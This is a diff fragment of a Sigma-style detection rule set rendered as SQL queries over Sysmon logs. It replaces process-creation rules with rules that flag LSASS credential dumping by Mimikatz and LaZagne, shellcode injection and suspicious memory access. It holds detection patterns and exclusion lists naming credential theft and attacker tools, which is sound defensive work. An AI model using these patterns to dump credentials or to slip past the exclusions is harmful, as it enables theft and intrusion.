"author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 